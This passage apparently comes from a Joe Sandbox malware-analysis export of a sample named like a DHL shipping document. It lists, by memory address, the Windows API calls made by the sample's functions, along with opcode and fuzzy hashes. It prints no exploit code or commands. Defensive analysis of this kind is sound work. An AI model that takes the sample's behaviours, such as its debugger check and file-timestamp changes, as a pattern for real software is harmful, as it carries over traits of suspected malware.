                                                                                          • Part of subcall function 00C22D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00C29A24), ref: 00C22D69
                                                                                          • Part of subcall function 00C22D55: GetLastError.KERNEL32(00000000,?,00C29A24), ref: 00C22D7B
                                                                                        • _free.LIBCMT ref: 00C6971C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                                        • String ID:
                                                                                        • API String ID: 1552873950-0
                                                                                        • Opcode ID: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                                                        • Instruction ID: 43e8cbdb7b55e25e3a24e82c867da83673ebe983841b93c3faba12057dc79b6d
                                                                                        • Opcode Fuzzy Hash: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                                                        • Instruction Fuzzy Hash: B8516FB1D04219AFDF249FA4DC81A9EBBB9EF48300F10459EF209A3281DB715A90DF59
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                                        • String ID:
                                                                                        • API String ID: 2782032738-0
                                                                                        • Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                                                        • Instruction ID: 30cf96b548e6791076af48d6720de26c9475bcdeaea3c3a3d9d230e78207da82
                                                                                        • Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                                                        • Instruction Fuzzy Hash: 9F41A475A007659BDB1CCF69E8809AA7BA6AF45764B24813DE835C7E80DB70DE81CB40
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00C044CF
                                                                                          • Part of subcall function 00C0407C: _memset.LIBCMT ref: 00C040FC
                                                                                          • Part of subcall function 00C0407C: _wcscpy.LIBCMT ref: 00C04150
                                                                                          • Part of subcall function 00C0407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00C04160
                                                                                        • KillTimer.USER32(?,00000001,?,?), ref: 00C04524
                                                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00C04533
                                                                                        • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00C3D4B9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                                        • String ID:
                                                                                        • API String ID: 1378193009-0
                                                                                        • Opcode ID: b37dc9eef381fb134bbe361e8017caa4d2869c91c4cd91da921cf650d680247f
                                                                                        • Instruction ID: 37b33bf02b2d1327146e24c81624752feb78c86f97198a1282a369fd71cb2885
                                                                                        • Opcode Fuzzy Hash: b37dc9eef381fb134bbe361e8017caa4d2869c91c4cd91da921cf650d680247f
                                                                                        • Instruction Fuzzy Hash: 2C21C5B1904794AFE7328B24DC55BEBBBECAB05318F0400DDE79A56181C3742A84DB51
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00C3EA39
                                                                                        • GetOpenFileNameW.COMDLG32(?), ref: 00C3EA83
                                                                                          • Part of subcall function 00C04750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C04743,?,?,00C037AE,?), ref: 00C04770
                                                                                          • Part of subcall function 00C20791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00C207B0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Name$Path$FileFullLongOpen_memset
                                                                                        • String ID: X
                                                                                        • API String ID: 3777226403-3081909835
                                                                                        • Opcode ID: 5725c7296378e7c30f21e5bb7cbab83acfe9b1fbbd32fd92a02f4748cc9742aa
                                                                                        • Instruction ID: bf38a78d3297977bff321c67d9a0305f8c26c81de86f82bea46ba43945853062
                                                                                        • Opcode Fuzzy Hash: 5725c7296378e7c30f21e5bb7cbab83acfe9b1fbbd32fd92a02f4748cc9742aa
                                                                                        • Instruction Fuzzy Hash: DD21C371A10258ABCF05DF94D845BEE7BFCAF48714F00401AE408A7281DBB45989DFA1
                                                                                        APIs
                                                                                        • GetTempPathW.KERNEL32(00000104,?), ref: 00C698F8
                                                                                        • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00C6990F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Temp$FileNamePath
                                                                                        • String ID: aut
                                                                                        • API String ID: 3285503233-3010740371
                                                                                        • Opcode ID: afa2eb29edf75f47a7a437493aed6eae0847061956912eaea7bbcf48a5192e03
                                                                                        • Instruction ID: 2550ef8b81461c75c7364af67c57857fc9183143dd819203d9579586b432830d
                                                                                        • Opcode Fuzzy Hash: afa2eb29edf75f47a7a437493aed6eae0847061956912eaea7bbcf48a5192e03
                                                                                        • Instruction Fuzzy Hash: 43D05E7954030DABDB509BA0DC0EFDA773CE714700F0002B1BA94D10A1EAB195998B95
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 9ecc7df98fb2e932f96b263e98f307fe212c27e28176a933cb58a03dac650c56
                                                                                        • Instruction ID: 8fe43e654e26c7b81f6d109c33b377626da057547b14131e967dce774e180d9c
                                                                                        • Opcode Fuzzy Hash: 9ecc7df98fb2e932f96b263e98f307fe212c27e28176a933cb58a03dac650c56
                                                                                        • Instruction Fuzzy Hash: 4EF12A716083019FCB14DF29C484A6ABBE5FF88314F54892EF8A99B391D731E945CF82
                                                                                        APIs
                                                                                          • Part of subcall function 00C20162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00C20193
                                                                                          • Part of subcall function 00C20162: MapVirtualKeyW.USER32(00000010,00000000), ref: 00C2019B
                                                                                          • Part of subcall function 00C20162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00C201A6
                                                                                          • Part of subcall function 00C20162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00C201B1
                                                                                          • Part of subcall function 00C20162: MapVirtualKeyW.USER32(00000011,00000000), ref: 00C201B9
                                                                                          • Part of subcall function 00C20162: MapVirtualKeyW.USER32(00000012,00000000), ref: 00C201C1
                                                                                          • Part of subcall function 00C160F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00C0F930), ref: 00C16154
                                                                                        • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00C0F9CD
                                                                                        • OleInitialize.OLE32(00000000), ref: 00C0FA4A
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00C445C8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                        • String ID:
                                                                                        • API String ID: 1986988660-0
                                                                                        • Opcode ID: e0ca921cc7f3bf33fb90f7e9c340144d7a29cb6efed6c6fae82fc5e6d5e5945c
                                                                                        • Instruction ID: 1e1fbb22344d0ba7e839aab8796b6a9eb0049bcf2f45a42b68eae97dab0e42b3
                                                                                        • Opcode Fuzzy Hash: e0ca921cc7f3bf33fb90f7e9c340144d7a29cb6efed6c6fae82fc5e6d5e5945c
                                                                                        • Instruction Fuzzy Hash: CB81ACB0915A80CFC788DF29E845F1D7BE5EBA8306794822EE419CB2B1EB7064C5DF14
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00C04370
                                                                                        • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00C04415
                                                                                        • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00C04432
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: IconNotifyShell_$_memset
                                                                                        • String ID:
                                                                                        • API String ID: 1505330794-0
                                                                                        • Opcode ID: d59ec8341b1bb6c3faf0f620fd97b09c2200fb1eeba6f21e98877cd38feeb6c3
                                                                                        • Instruction ID: 7031caf101f77ba55a356bbab68732c8bced6512e7242adab624558e93afad91
                                                                                        • Opcode Fuzzy Hash: d59ec8341b1bb6c3faf0f620fd97b09c2200fb1eeba6f21e98877cd38feeb6c3
                                                                                        • Instruction Fuzzy Hash: 563173B15047119FD725DF64D884B9BBBF8FB58309F00092EF69AC2291D771BA84CB52
                                                                                        APIs
                                                                                        • __FF_MSGBANNER.LIBCMT ref: 00C25733
                                                                                          • Part of subcall function 00C2A16B: __NMSG_WRITE.LIBCMT ref: 00C2A192
                                                                                          • Part of subcall function 00C2A16B: __NMSG_WRITE.LIBCMT ref: 00C2A19C
                                                                                        • __NMSG_WRITE.LIBCMT ref: 00C2573A
                                                                                          • Part of subcall function 00C2A1C8: GetModuleFileNameW.KERNEL32(00000000,00CC33BA,00000104,?,00000001,00000000), ref: 00C2A25A
                                                                                          • Part of subcall function 00C2A1C8: ___crtMessageBoxW.LIBCMT ref: 00C2A308
                                                                                          • Part of subcall function 00C2309F: ___crtCorExitProcess.LIBCMT ref: 00C230A5
                                                                                          • Part of subcall function 00C2309F: ExitProcess.KERNEL32 ref: 00C230AE
                                                                                          • Part of subcall function 00C28B28: __getptd_noexit.LIBCMT ref: 00C28B28
                                                                                        • RtlAllocateHeap.NTDLL(013A0000,00000000,00000001,00000000,?,?,?,00C20DD3,?), ref: 00C2575F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                        • String ID:
                                                                                        • API String ID: 1372826849-0
                                                                                        • Opcode ID: a924ee3cefb34e05a01f679890def93da170cc9b790954e806e61dc7f698d19b
                                                                                        • Instruction ID: 4f753e1eb822fb53d5136101cc85fb67c8f848279c71ee8ab212a6d193f9b725
                                                                                        • Opcode Fuzzy Hash: a924ee3cefb34e05a01f679890def93da170cc9b790954e806e61dc7f698d19b
                                                                                        • Instruction Fuzzy Hash: 97012875290B71DBDA106735FC42B2F73488F42F61F100429F415DB9D1DE748E016761
                                                                                        APIs
                                                                                        • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00C69548,?,?,?,?,?,00000004), ref: 00C698BB
                                                                                        • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00C69548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00C698D1
                                                                                        • CloseHandle.KERNEL32(00000000,?,00C69548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00C698D8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$CloseCreateHandleTime
                                                                                        • String ID:
                                                                                        • API String ID: 3397143404-0
                                                                                        • Opcode ID: 21575ec053f26cd3de7b983b3fb0cc8c36779bcfaed72a9058b0f0368c5dd359
                                                                                        • Instruction ID: 16e48860432be8b467a126b7f39bfb1ff4ececaecfb2a7a0c3984002d6eba47d
                                                                                        • Opcode Fuzzy Hash: 21575ec053f26cd3de7b983b3fb0cc8c36779bcfaed72a9058b0f0368c5dd359
                                                                                        • Instruction Fuzzy Hash: EEE08632140214B7EB312B54EC0DFDE7B59EB0A761F104124FB24A90F087B11622979C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: CALL
                                                                                        • API String ID: 0-4196123274
                                                                                        • Opcode ID: 730c4ee3d96c69c2ac33743e30a0f7f306b5e3e2fd7aea5547cc554a0f6b14d6
                                                                                        • Instruction ID: a00cd33ef74ce2fd1417ad98b9f8a4f9ff588fbe19cefcd84277e6add7a74bbe
                                                                                        • Opcode Fuzzy Hash: 730c4ee3d96c69c2ac33743e30a0f7f306b5e3e2fd7aea5547cc554a0f6b14d6
                                                                                        • Instruction Fuzzy Hash: 5B223774608301DFDB24DF14C494B6ABBE1BF84304F15896DE99A8B3A2D731ED85DB82
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memmove
                                                                                        • String ID: EA06
                                                                                        • API String ID: 4104443479-3962188686
                                                                                        • Opcode ID: 1077aa9362e8a6f3486e6aafb09c99e0d7cc5dce69f0253612f99591087743b3
                                                                                        • Instruction ID: 0037c28f749689e43c454b456b7c6ef93e417ad2ca87bbf51627f7a827ac7a35
                                                                                        • Opcode Fuzzy Hash: 1077aa9362e8a6f3486e6aafb09c99e0d7cc5dce69f0253612f99591087743b3
                                                                                        • Instruction Fuzzy Hash: D7417AF1A043586BDF299B64D8617BF7FA69B55300F284075EF829B2C2D6309E44D3A1
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memmove
                                                                                        • String ID:
                                                                                        • API String ID: 4104443479-0
                                                                                        • Opcode ID: dcaa55ca9a04723143b9e8694f613c9e7f590ea8bac40c6ab2e3bad66fc376f5
                                                                                        • Instruction ID: 7b912ed2c50e75f03d093f64581ed8bbca9a9763229692349c0526e69f19143d
                                                                                        • Opcode Fuzzy Hash: dcaa55ca9a04723143b9e8694f613c9e7f590ea8bac40c6ab2e3bad66fc376f5
                                                                                        • Instruction Fuzzy Hash: FA31C7B1B04506AFC708DF68D8D1E69B3A5FF48310B158729E529CB6D1EB30FA50DB90
                                                                                        APIs
                                                                                        • IsThemeActive.UXTHEME ref: 00C04834
                                                                                          • Part of subcall function 00C2336C: __lock.LIBCMT ref: 00C23372
                                                                                          • Part of subcall function 00C2336C: DecodePointer.KERNEL32(00000001,?,00C04849,00C57C74), ref: 00C2337E
                                                                                          • Part of subcall function 00C2336C: EncodePointer.KERNEL32(?,?,00C04849,00C57C74), ref: 00C23389
                                                                                          • Part of subcall function 00C048FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00C04915
                                                                                          • Part of subcall function 00C048FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00C0492A
                                                                                          • Part of subcall function 00C03B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00C03B68
                                                                                          • Part of subcall function 00C03B3A: IsDebuggerPresent.KERNEL32 ref: 00C03B7A
                                                                                          • Part of subcall function 00C03B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,00CC52F8,00CC52E0,?,?), ref: 00C03BEB
                                                                                          • Part of subcall function 00C03B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00C03C6F
                                                                                        • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00C04874
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                                                        • String ID:
                                                                                        • API String ID: 1438897964-0
                                                                                        • Opcode ID: a38c90d15a753d164f18d92f4359197d9140fcdf77c5139c57aef91776696685
                                                                                        • Instruction ID: 0ca0b1e085d2d1b8be0ea00bff199403ec5527cd27133c01c7822167649f4f4a
                                                                                        • Opcode Fuzzy Hash: a38c90d15a753d164f18d92f4359197d9140fcdf77c5139c57aef91776696685
                                                                                        • Instruction Fuzzy Hash: 35119DB19083519FC704DF29E805B0EBBE8EF94750F108A1EF440872F1DB709A89CB96
                                                                                        APIs
                                                                                          • Part of subcall function 00C2571C: __FF_MSGBANNER.LIBCMT ref: 00C25733
                                                                                          • Part of subcall function 00C2571C: __NMSG_WRITE.LIBCMT ref: 00C2573A
                                                                                          • Part of subcall function 00C2571C: RtlAllocateHeap.NTDLL(013A0000,00000000,00000001,00000000,?,?,?,00C20DD3,?), ref: 00C2575F
                                                                                        • std::exception::exception.LIBCMT ref: 00C20DEC
                                                                                        • __CxxThrowException@8.LIBCMT ref: 00C20E01
                                                                                          • Part of subcall function 00C2859B: RaiseException.KERNEL32(?,?,?,00CB9E78,00000000,?,?,?,?,00C20E06,?,00CB9E78,?,00000001), ref: 00C285F0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                        • String ID:
                                                                                        • API String ID: 3902256705-0
                                                                                        • Opcode ID: 1e33197620802e0e0c6eb2c31bae2e1ddea7a5090bb92936d37ad716eae13c4b
                                                                                        • Instruction ID: 8a6185c7bc9875860a70a0ff983fbad43ff43061cfc6a9cff496c94349e61b37
                                                                                        • Opcode Fuzzy Hash: 1e33197620802e0e0c6eb2c31bae2e1ddea7a5090bb92936d37ad716eae13c4b
                                                                                        • Instruction Fuzzy Hash: F2F0A47650233976DF10FAA8FC159DFB7AC9F01311F204426F95496992DF709B84E2D1
                                                                                        APIs
                                                                                          • Part of subcall function 00C28B28: __getptd_noexit.LIBCMT ref: 00C28B28
                                                                                        • __lock_file.LIBCMT ref: 00C253EB
                                                                                          • Part of subcall function 00C26C11: __lock.LIBCMT ref: 00C26C34
                                                                                        • __fclose_nolock.LIBCMT ref: 00C253F6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
